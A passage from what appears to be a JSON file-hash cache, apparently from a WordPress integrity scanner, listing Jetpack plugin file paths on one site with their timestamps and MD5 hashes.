6de5133a9c9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/contact-form\\/js\\/grunion-frontend.min.js\":{\"d\":1544704149,\"h\":\"81c166429759c226d0d4e2e72c4c83a5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/contact-form\\/js\\/grunion-admin.min.js\":{\"d\":1544704149,\"h\":\"c82ee40c22f31395621fbc9234125336\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/photon\\/photon.min.js\":{\"d\":1544704149,\"h\":\"beec1a513bd54b8793499bc872d3bac5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/lazy-images\\/js\\/lazy-images.min.js\":{\"d\":1544704149,\"h\":\"fcfbdda5684090342d76c10b69f2905f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/comment-likes\\/comment-like-count.min.js\":{\"d\":1544704149,\"h\":\"c2ec1a7a8924ac942ee7da2ed1a540db\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/sharedaddy\\/sharing.min.js\":{\"d\":1544704149,\"h\":\"f25d9fae58007fff4c2fcad30a51c5c9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/sharedaddy\\/admin-sharing.min.js\":{\"d\":1544704149,\"h\":\"28af05a8dae6f43f238caea87575d0ba\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/publicize\\/assets\\/publicize.min.js\":{\"d\":1544704149,\"h\":\"6096dd3fb3409bd258ad3ceb37e4902e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/videopress\\/js\\/editor-view.min.js\":{\"d\":1544704149,\"h\":\"4e7f821ab4ee47f09f5228a0627d5765\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/videopress\\/js\\/videopress-plupload.min.js\":{\"d\":1544704149,\"h\":\"b9430bfa9ef553dad05bcd4005cbbcdd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/videopress\\/js\\/media-video-widget-extensions.min.js\":{\"d\":1544704149,\"h\":\"fde956089cce5e7dba1f031e80b4feda\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/videopress\\/js\\/videopress-uploader.min.js\":{\"d\":1544704149,\"h\":\"7548e77d390b1011b45b9a127d7f120f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/tiled-gallery\\/tiled-gallery\\/tiled-gallery.min.js\":{\"d\":1544704149,\"h\":\"c9155d31e6ef4168648b70ef57103fa0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/masterbar\\/tracks-events.min.js\":{\"d\":1544704149,\"h\":\"64279e5247be73dbf11f96290be326a3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/likes\\/queuehandler.min.js\":{\"d\":1544704149,\"h\":\"a1c0bc72514c3d8911576f1d700760a0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/likes\\/post-count.min.js\":{\"d\":1544704149,\"h\":\"75285876b8ef49c14f1a4f44f32ba181\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/likes\\/post-count-jetpack.min.js\":{\"d\":1544704149,\"h\":\"213d9bbf9f3dced287cd4b69a9454e31\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/shortcodes\\/js\\/recipes.min.js\":{\"d\":1544704149,\"h\":\"c05564f94b5cadde347411bb8f8b0322\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/shortcodes\\/js\\/gist.min.js\":{\"d\":1544704149,\"h\":\"8e5624b728978632df2340d1fe6a09f5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/shortcodes\\/js\\/recipes-printthis.min.js\":{\"d\":1544704149,\"h\":\"76883c0b1bcef704910151688b21ea3b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/shortcodes\\/js\\/main.min.js\":{\"d\":1544704149,\"h\":\"51b7a729efb77ca79c225a831d4b7d40\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/shortcodes\\/js\\/quiz.min.js\":{\"d\":1544704149,\"h\":\"84e91ff8f8ada94a6b57bf9f99b4a5d7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/shortcodes\\/js\\/slideshow-shortcode.min.js\":{\"d\":1544704149,\"h\":\"cb31ea42ab778a27ed513678f952aae6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/shortcodes\\/js\\/jmpress.min.js\":{\"d\":1544704149,\"h\":\"bb5fd18cb248a341fb7d7f1bf6d0ee9e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/shortcodes\\/js\\/instagram.min.js\":{\"d\":1544704149,\"h\":\"5a61f4b5ca37661143827748c1fdf9c4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/shortcodes\\/js\\/brightcove.min.js\":{\"d\":1544704149,\"h\":\"d842f99e2c739d6ea584b0afc7b075fd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/static.html\":{\"d\":1544704145,\"h\":\"f534dde0dbe66fe72e34645d9ee80cbf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/twitter-timeline.min.js\":{\"d\":1544704145,\"h\":\"49ceb08dd85b178a17ef4dc4fc94c975\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/jetpack-modules.views.min.js\":{\"d\":1544704145,\"h\":\"516c7017ff302e1294c8c95d4a3ad27e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/jetpack-connection-banner.min.js\":{\"d\":1544704145,\"h\":\"7586c220a83f58158f6d750ead536855\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/idc-notice.min.js\":{\"d\":1544704149,\"h\":\"bab8c82c3ae6041d7bea3bf5838b50bd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/admin.dops-style.css\":{\"d\":1544704149,\"h\":\"40ae9e48c52cd0178e897005b49a2603\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/facebook-embed.min.js\":{\"d\":1544704149,\"h\":\"8dcc2395ab00b42f3f16c295fe5b15a9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/admin.js\":{\"d\":1544704149,\"h\":\"69bf3ee852a20a1a0e70ff692319cd8b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/static-version-notice.html\":{\"d\":1544704149,\"h\":\"9841c9d80b0c80d84f4d34bba073d9bf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/jquery.jetpack-resize.min.js\":{\"d\":1544704149,\"h\":\"5377236c172ae720b31e89bb6b6927e0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/jetpack-admin.min.js\":{\"d\":1544704149,\"h\":\"dbbb1aa30dd96ea112f286c5d03dc425\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/jetpack-modules.models.min.js\":{\"d\":1544704149,\"h\":\"bc1836bbab1fd8fed1e09c3f833b6b2b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/jetpack-modules.min.js\":{\"d\":1544704149,\"h\":\"72f100518443530471dfd66c70d8af97\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/style.min.rtl.css\":{\"d\":1544704149,\"h\":\"ced6db617e20e3ca42bbc6142083aa4e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/admin.dops-style.rtl.css\":{\"d\":1544704149,\"h\":\"a1b0dc2c1d73209a61fd87fd6c0448c8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/accessible-focus.min.js\":{\"d\":1544704149,\"h\":\"08de39799451df07c2f461e98c9afc68\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/jetpack-jitm.min.js\":{\"d\":1544704149,\"h\":\"5fd9777e2ecc453277df0d6a17d5036c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/static-ie-notice.html\":{\"d\":1544704149,\"h\":\"1a55eeedd4ae4ec610c160b18ddb14c0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/style.min.css\":{\"d\":1544704149,\"h\":\"35c7ea04a25028c2d33c5980ecdc69cf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/spin.min.js\":{\"d\":1544704149,\"h\":\"057cf11dd7c7b32136178af16a78fd46\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/postmessage.min.js\":{\"d\":1544704149,\"h\":\"f5c53903a2bf3d5a36414cd53d70f5b0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/jquery.spin.min.js\":{\"d\":1544704149,\"h\":\"457ac998ff643c25aed6820bb25143ac\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/static-noscript-notice.html\":{\"d\":1544704149,\"h\":\"13933a77cc5f04ba731b314733c9f3fe\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/gallery-settings.min.js\":{\"d\":1544704149,\"h\":\"4c88715c28603b0d7063747f3e7fc4a0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/core-api\\/wpcom-fields\\/post-fields-publicize-connections.php\":{\"d\":1544704149,\"h\":\"56b2d4a97e962f65d026991ddc4ae308\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/core-api\\/wpcom-endpoints\\/publicize-connections.php\":{\"d\":1544704149,\"h\":\"b4c4a9fcdd370e65138bf33eb17cda33\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/core-api\\/wpcom-endpoints\\/hello.php\":{\"d\":1544704149,\"h\":\"212b256c28a206d3cc7e2b146038c521\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/core-api\\/wpcom-endpoints\\/publicize-connection-test-results.php\":{\"d\":1544704149,\"h\":\"654fe9cd5d3656ebcb7cf3367a96cad3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/core-api\\/wpcom-endpoints\\/sites-posts-featured-media-url.php\":{\"d\":1544704149,\"h\":\"15127d735b611739df7cd110bcad4667\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/core-api\\/wpcom-endpoints\\/publicize-services.php\":{\"d\":1544704149,\"h\":\"201525bed7503c71f243f40c6c99ef30\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/core-api\\/class.jetpack-core-api-site-endpoints.php\":{\"d\":1544704149,\"h\":\"bc9489439cd6526ca340d135a106401c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/core-api\\/class.jetpack-core-api-widgets-endpoints.php\":{\"d\":1544704149,\"h\":\"6310a800b895fd360b748a3c582a559f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/core-api\\/class.jetpack-core-api-module-endpoints.php\":{\"d\":1544704149,\"h\":\"b4e73a9cbc8961b6103e766849752ad1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/core-api\\/class-wpcom-rest-field-controller.php\":{\"d\":1544704149,\"h\":\"2f23345ee9efdafa524f359e687c0a59\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/core-api\\/load-wpcom-endpoints.php\":{\"d\":1544704149,\"h\":\"0ffbad23afcf5c77b5ec45f954fa3ab2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/core-api\\/class.jetpack-core-api-xmlrpc-consumer-endpoint.php\":{\"d\":1544704149,\"h\":\"8a3eca785742f513cb6b18b8b5461a9b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/admin-pages\\/class.jetpack-landing-page.php\":{\"d\":1544704149,\"h\":\"a3492395bdd7eeb7a5dbf722882afad5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/admin-pages\\/class.jetpack-admin-page.php\":{\"d\":1544704149,\"h\":\"6de3ef10474faaaec8cdd6918a73c49e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/admin-pages\\/class.jetpack-react-page.php\":{\"d\":1544704149,\"h\":\"11ad837e81ac1252fb7d57d89127ffb7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/admin-pages\\/class.jetpack-settings-page.php\":{\"d\":1544704149,\"h\":\"55db2f4280d9a45f07d7eda4a5da900f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/jetpack-wpes-query-builder\\/jetpack-wpes-query-builder.php\":{\"d\":1544704149,\"h\":\"7ebcdc5b910d133516f5164c1020e974\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/jetpack-wpes-query-builder\\/jetpack-wpes-query-parser.php\":{\"d\":1544704149,\"h\":\"303b2f88736a94acc5266050267c3e02\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/tracks\\/client.php\":{\"d\":1544704149,\"h\":\"99c90d556b59c87095d22a1b104c1117\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/tracks\\/tracks-callables.js\":{\"d\":1544704149,\"h\":\"62557f141608bc6191bb4d0dd176255e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/tracks\\/class.tracks-event.php\":{\"d\":1544704149,\"h\":\"6a099d3594e594d997905c6b18dd4b7e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/tracks\\/tracks-ajax.js\":{\"d\":1544704149,\"h\":\"cfd3833d088930f4d7effdfa35a6f6b1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/tracks\\/class.tracks-client.php\":{\"d\":1544704149,\"h\":\"8b3841f73a40c469581b0002d02f7661\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/markdown\\/0-load.php\":{\"d\":1544704149,\"h\":\"c3285a9e4bc3a05ca188816466ab909a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/markdown\\/README.md\":{\"d\":1544704149,\"h\":\"35a86489600b77e0da555cc7ff1ef4e8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/markdown\\/gfm.php\":{\"d\":1544704149,\"h\":\"f54851879408042d821596df534f7867\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/markdown\\/extra.php\":{\"d\":1544704152,\"h\":\"8c42f57a8ad63990d9d01ed4eececd20\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/class.jetpack-search-performance-logger.php\":{\"d\":1544704149,\"h\":\"e62654ad8629addca8a4262fed169ff9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/tonesque.php\":{\"d\":1544704149,\"h\":\"fd40aee80f6335afd819f42e14a78b53\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/functions.wp-notify.php\":{\"d\":1544704149,\"h\":\"3bfaa28081526db336236a13d8116066\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/widgets.php\":{\"d\":1544704149,\"h\":\"7521344031b76315a8a912ec5b686e02\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/class.jetpack-keyring-service-helper.php\":{\"d\":1544704149,\"h\":\"2de57fbcf3db1f2a6dc00f2a7de0944f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/plugins.php\":{\"d\":1544704149,\"h\":\"93a6c0ddebdfbde6d1b0fc175e4d28aa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/class.media-summary.php\":{\"d\":1544704149,\"h\":\"0bc9f13faa17725d2030625dd97f9298\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/class.core-rest-api-endpoints.php\":{\"d\":1544704149,\"h\":\"d17dd3e3d620f817d1bf9264efbf3d16\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/class.color.php\":{\"d\":1544704152,\"h\":\"98852f9d9b1bc5cee0149dc859e3fdcf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/class.media.php\":{\"d\":1544704152,\"h\":\"4986204f617b1098e7af97427813a573\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/icalendar-reader.php\":{\"d\":1544704152,\"h\":\"1cd772840677a831634e24c904f064b4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/class.jetpack-iframe-embed.php\":{\"d\":1544704152,\"h\":\"345d699e9d4dafbbb3618df665a13913\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/class.jetpack-automatic-install-skin.php\":{\"d\":1544704152,\"h\":\"f6d520e1539b91b739f7e63e398c58b3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/lib\\/class.media-extractor.php\":{\"d\":1544704152,\"h\":\"8947a3eea1df34ff05fec5ba742e64b9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/genericons\\/genericons\\/rtl\\/genericons-rtl.css\":{\"d\":1544704152,\"h\":\"592b0e60968bbac98f235967494be001\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/genericons\\/genericons\\/Genericons.eot\":{\"d\":1544704152,\"h\":\"bebb165302a5d3a90ab9012f3b5d733e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/genericons\\/genericons\\/Genericons.ttf\":{\"d\":1544704152,\"h\":\"008827208ffc4eeab99bf3cc14fe1e56\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/genericons\\/genericons\\/genericons.css\":{\"d\":1544704152,\"h\":\"13a6500ddf36c6dd581877aefc78d34d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/genericons\\/genericons\\/Genericons.woff\":{\"d\":1544704152,\"h\":\"f3f73b280148eeed102d4a6874ac7886\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/genericons\\/README.md\":{\"d\":1544704152,\"h\":\"031ec4ed36a007d7d9f15600d7ebd5e8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/genericons\\/COPYING.txt\":{\"d\":1544704152,\"h\":\"b9423b96eb6160477fd4a2b7de890419\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/genericons\\/genericons.css\":{\"d\":1544704152,\"h\":\"c14dd6e84e694a66c7e27f11220ed49a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/genericons\\/LICENSE.txt\":{\"d\":1544704152,\"h\":\"b234ee4d69f5fce4486a80fdaf4a4263\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/blocks\\/map\\/view.rtl.css\":{\"d\":1544704152,\"h\":\"bf2639d0ae3455af440b15b08c715700\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/blocks\\/map\\/mapbox-gl.css\":{\"d\":1544704152,\"h\":\"29ee372475ea4b74a39929e4a1c673e6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/blocks\\/map\\/view.js\":{\"d\":1544704152,\"h\":\"563f6140576777cae90f722076a24473\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/blocks\\/map\\/mapbox-gl.rtl.css\":{\"d\":1544704152,\"h\":\"50586d295e38f23c6c010e216332c487\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/blocks\\/map\\/mapbox-gl.js\":{\"d\":1544704153,\"h\":\"94460d5a7ae072814e7ddc0f6569136f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/blocks\\/map\\/view.css\":{\"d\":1544704153,\"h\":\"74eed7246c9cd0fb37122c1ec82e8079\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/blocks\\/editor-beta.js\":{\"d\":1544704152,\"h\":\"ecfa0fbae95b760cb25771ca5ab40456\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/blocks\\/editor.rtl.css\":{\"d\":1544704152,\"h\":\"3cba416156a3c297aee3ad5e40085fe5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/blocks\\/block-manifest.json\":{\"d\":1544704152,\"h\":\"2893b0dd63384ba172a8e071552ca6be\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/blocks\\/editor-beta.css\":{\"d\":1544704152,\"h\":\"76daef7054d9cf78e9959b42248d3c9d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/blocks\\/editor.css\":{\"d\":1544704153,\"h\":\"53fd9853024c0691502af753d821cab4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/blocks\\/editor-beta.rtl.css\":{\"d\":1544704153,\"h\":\"65d1122f1de92357e904dcc4616bb465\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/blocks\\/editor.js\":{\"d\":1544704153,\"h\":\"c91b1e80ea9176512b98846b7dc214a5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/fonts\\/automatticons\\/automatticons.woff\":{\"d\":1544704153,\"h\":\"7b1f63e7cf9ea085089c86d339776da8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/fonts\\/automatticons\\/automatticons.eot\":{\"d\":1544704153,\"h\":\"260e6601d42a749f3ee0fb464befee9e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/fonts\\/automatticons\\/automatticons.ttf\":{\"d\":1544704153,\"h\":\"0fcae5db01a205380ae71b71871bedad\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/fonts\\/jetpack\\/jetpack.eot\":{\"d\":1544704153,\"h\":\"07748bad73c37186f38c91e310bf2fbc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/fonts\\/jetpack\\/jetpack.ttf\":{\"d\":1544704153,\"h\":\"30dfde36fb190bf9589bd1fe8c7dbc0a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/fonts\\/jetpack\\/jetpack.woff\":{\"d\":1544704153,\"h\":\"e12b78ae32f56212ad1cb8af96684987\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/social-logos\\/social-logos.css\":{\"d\":1544704153,\"h\":\"ab1c342579eed95582cca0fbb5063057\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/social-logos\\/social-logos.min.css\":{\"d\":1544704153,\"h\":\"0d5604851b9b7a8b8b7ffb1e7b7f633e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/social-logos\\/social-logos.html\":{\"d\":1544704153,\"h\":\"e45dc27dcf98c2c0892efa5e054d9b70\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/social-logos\\/social-logos.